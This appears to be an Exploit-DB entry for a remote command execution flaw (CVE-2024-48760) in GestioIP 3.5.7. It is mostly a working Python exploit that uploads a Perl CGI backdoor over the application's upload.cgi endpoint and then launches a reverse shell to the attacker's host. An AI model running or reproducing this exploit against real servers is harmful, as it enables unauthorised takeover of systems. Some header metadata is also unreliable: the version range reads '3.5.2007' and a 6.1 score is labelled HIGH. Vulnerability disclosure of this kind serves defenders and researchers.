GestioIP 3.5.7 - Remote Command Execution (RCE)

vendor:

GestioIP

by:

m4xth0r (Maximiliano Belino)

6.1

CVSS

HIGH

Remote Command Execution (RCE)

CWE

Product Name: GestioIP

Affected Version From: 3.5.2007

Affected Version To: 3.5.2007

Patch Exists: NO

Related CWE: CVE-2024-48760

CPE: a:gestioip:gestioip:3.5.7

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2025

GestioIP 3.5.7 – Remote Command Execution (RCE)

The GestioIP version 3.5.7 is vulnerable to remote command execution. An attacker can exploit this vulnerability to execute arbitrary commands on the target server. This exploit is identified by CVE-2024-48760.

Mitigation:

To mitigate this vulnerability, it is recommended to update GestioIP to a patched version or apply the vendor-supplied fixes. Additionally, restrict network access to the application and implement strong authentication mechanisms.

Source

Exploit-DB raw data:

# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760

import requests
import sys

# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w

use strict;

print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";

my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g; 
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;

print "<html><body>";
print '<!-- CGI backdoor -->';

if (!$req) {
    print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
    print "Executing: $req";
}

print "<pre>";
my @cmd = `$req`;
print "</pre>";

foreach my $line (@cmd) {
    print $line . "<br/>";
}

print "</body></html>";
"""

# Exploit functions
def upload_file(session, file_name, file_data):
    """Uploads the file to the server"""
    files = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data)
    }
    response = session.post(target_url, files=files)
    if "OK" not in response.text:
        print(f"[!] Error uploading {file_name}.")
        sys.exit(1)
    return response

def run_command(session, cmd):
    """Execute a command in the server through the vuln"""
    url = target_url + '?' + cmd
    resp = session.get(url)
    print(resp.text)

def backdoor_exists(session):
    """Verifies if backdoor is already uploaded or not"""
    response = session.get(target_url + "?whoami")
    if "www-data" in response.text:
        return True  # backdoor already uploaded
    return False  # backdoor not uploaded yet

if __name__ == '__main__':
    with requests.Session() as session:
        session.auth = (username, password)

        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")

        # Execute the reverse shell
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)